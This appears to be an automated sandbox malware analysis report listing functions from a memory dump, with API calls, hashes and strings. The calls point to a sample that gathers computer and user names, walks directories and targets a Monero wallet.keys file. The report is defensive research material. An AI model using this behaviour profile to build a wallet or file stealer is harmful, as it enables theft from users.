Instruction ID: 81f0c1285c1fca011e4e143f0560922488e4e4f580caa6540a5204a826ec44f8
Opcode Fuzzy Hash: d3702b1458b3045a3554daf737b170d4190044814eba6fada05c6b6d6e0a7262
Instruction Fuzzy Hash: 4B01967690030D67CB54FB74DC86EEE73BCAB65300F0045D8B649D6191EE719A89CBE2

Function 00B810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B810B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00B810F7

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 114b8bf6641219e018fcd001cf7be7c7b813ac8d44936fff5569f0f6619026e4
Instruction ID: 2150fb161bb2b91bfa26ecf6cd44c4e746f92160145b240e0a55bfb6d53a2205
Opcode Fuzzy Hash: 114b8bf6641219e018fcd001cf7be7c7b813ac8d44936fff5569f0f6619026e4
Instruction Fuzzy Hash: A7F0E271641308BBEB14ABA8AC49FAAB7ECE705B15F301888F504E3290D5729E00CBA0

Function 00B98D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00B81B54,?,?,00BA564C,?,?,00BA0E1F), ref: 00B98D9F

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 775e6d9ee2607462eef0f7032600e778aa6c12fbde9e0a73d43416cb9a0157f3
Instruction ID: d8aa88f153588c52e5d3fb82d70b884d87f39fbe819629f81c380e752a77f780
Opcode Fuzzy Hash: 775e6d9ee2607462eef0f7032600e778aa6c12fbde9e0a73d43416cb9a0157f3
Instruction Fuzzy Hash: A6F09271C00208ABCF04EFA4D5496DCBBB4EB11314F1081A9E866A72D0DB745A55DB81

Function 00B98DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B98E0B

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 76baa9c56899e464ffa29e9e17cf1eee2d18898758cd4a28d9edfa16d9665130
Instruction ID: 96b40bfc449d530887b948173187755cd08591af7e11ae1ea5907139c45947eb
Opcode Fuzzy Hash: 76baa9c56899e464ffa29e9e17cf1eee2d18898758cd4a28d9edfa16d9665130
Instruction Fuzzy Hash: 7DE0123194034C6BDB51DB94CC96FAD73BC9B44B01F004295BA0C9A1C0DE70AB858B91

Function 00B81190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97910
Part of subcall function 00B978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B97917
Part of subcall function 00B978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B9792F

Part of subcall function 00B97850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B811B7), ref: 00B97880
Part of subcall function 00B97850: RtlAllocateHeap.NTDLL(00000000), ref: 00B97887
Part of subcall function 00B97850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B9789F

ExitProcess.KERNEL32 ref: 00B811C6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: c357625fe3eb17b36c6fb0c84ff5c593a8c4159d6220339f20c8bf443aba60ce
Instruction ID: 9569bb3824c5d128cee6d0f098b368b65dcb46e961b60c2d46045411e0d27c24
Opcode Fuzzy Hash: c357625fe3eb17b36c6fb0c84ff5c593a8c4159d6220339f20c8bf443aba60ce
Instruction Fuzzy Hash: 20E012B596430753CE0073BAAC4EF2A37DC9B1534DF0408B5FA05E2252FE25E801C67A

Non-executed Functions

Function 00B938B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00B938CC
FindFirstFileA.KERNEL32(?,?), ref: 00B938E3
lstrcat.KERNEL32(?,?), ref: 00B93935
StrCmpCA.SHLWAPI(?,00BA0F70), ref: 00B93947
StrCmpCA.SHLWAPI(?,00BA0F74), ref: 00B9395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00B93C67
FindClose.KERNEL32(000000FF), ref: 00B93C7C

Strings

%s\%s\%s, xrefs: 00B93A4A
%s\%s, xrefs: 00B9397A
%s\*, xrefs: 00B938C0
%s%s, xrefs: 00B93AAD
%s\%s, xrefs: 00B93A6F

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: c0408ae64ae44342ffb0b9557f042ad395af1aebff2c0b6013b3fe2c4368b03f
Instruction ID: b063e2cec8b8687b3c9def71d62079357335c6f125ba7d6c4afa397c45168478
Opcode Fuzzy Hash: c0408ae64ae44342ffb0b9557f042ad395af1aebff2c0b6013b3fe2c4368b03f
Instruction Fuzzy Hash: 1CA13EB1A003199BDF24EBA4DC85FEE73B8FB48704F0445D8A60D96151EB759B84CFA2

Function 00B94570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B94580
RtlAllocateHeap.NTDLL(00000000), ref: 00B94587
wsprintfA.USER32 ref: 00B945A6
FindFirstFileA.KERNEL32(?,?), ref: 00B945BD
StrCmpCA.SHLWAPI(?,00BA0FC4), ref: 00B945EB
StrCmpCA.SHLWAPI(?,00BA0FC8), ref: 00B94601
FindNextFileA.KERNEL32(000000FF,?), ref: 00B9468B
FindClose.KERNEL32(000000FF), ref: 00B946A0
lstrcat.KERNEL32(?,0133E8F8), ref: 00B946C5
lstrcat.KERNEL32(?,0133D980), ref: 00B946D8
lstrlen.KERNEL32(?), ref: 00B946E5
lstrlen.KERNEL32(?), ref: 00B946F6

Strings

%s\%s, xrefs: 00B9461B
%s\*, xrefs: 00B9459A

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 2456726e5b6bab19939d6656ec28206e30201cf4139dc1d72bb428161db4a067
Instruction ID: 01de52c78f570a622e94c68f03821605ea5455a5ec6d826ab820f121a5759c1d
Opcode Fuzzy Hash: 2456726e5b6bab19939d6656ec28206e30201cf4139dc1d72bb428161db4a067
Instruction Fuzzy Hash: AC5153B155021D9BCB20EBB4DC89FED73BCAB58304F4045D8B609D6190EB759B85CFA2

Function 00B8ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00B8ED3E
FindFirstFileA.KERNEL32(?,?), ref: 00B8ED55
StrCmpCA.SHLWAPI(?,00BA1538), ref: 00B8EDAB
StrCmpCA.SHLWAPI(?,00BA153C), ref: 00B8EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 00B8F2AE
FindClose.KERNEL32(000000FF), ref: 00B8F2C3

Strings

%s\*.*, xrefs: 00B8ED32

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 100ed7e57ff25bb400b99003f9c47fd44bafd8977a463d48875dcb8d2532a4a4
Instruction ID: 7b803c1fe723d02cacea162a9dfe23b027a0ef94511641152bc1cad5f27bf9fe
Opcode Fuzzy Hash: 100ed7e57ff25bb400b99003f9c47fd44bafd8977a463d48875dcb8d2532a4a4
Instruction Fuzzy Hash: B4E1B1719111199ADF54FB64DC92EEE73B8AF55300F4045F9B50A62092EF306F8ACFA2

Function 00B8DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BA0C2E), ref: 00B8DE5E
StrCmpCA.SHLWAPI(?,00BA14C8), ref: 00B8DEAE
StrCmpCA.SHLWAPI(?,00BA14CC), ref: 00B8DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 00B8E3E0
FindClose.KERNEL32(000000FF), ref: 00B8E3F2

Strings

\*.*, xrefs: 00B8DE26

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
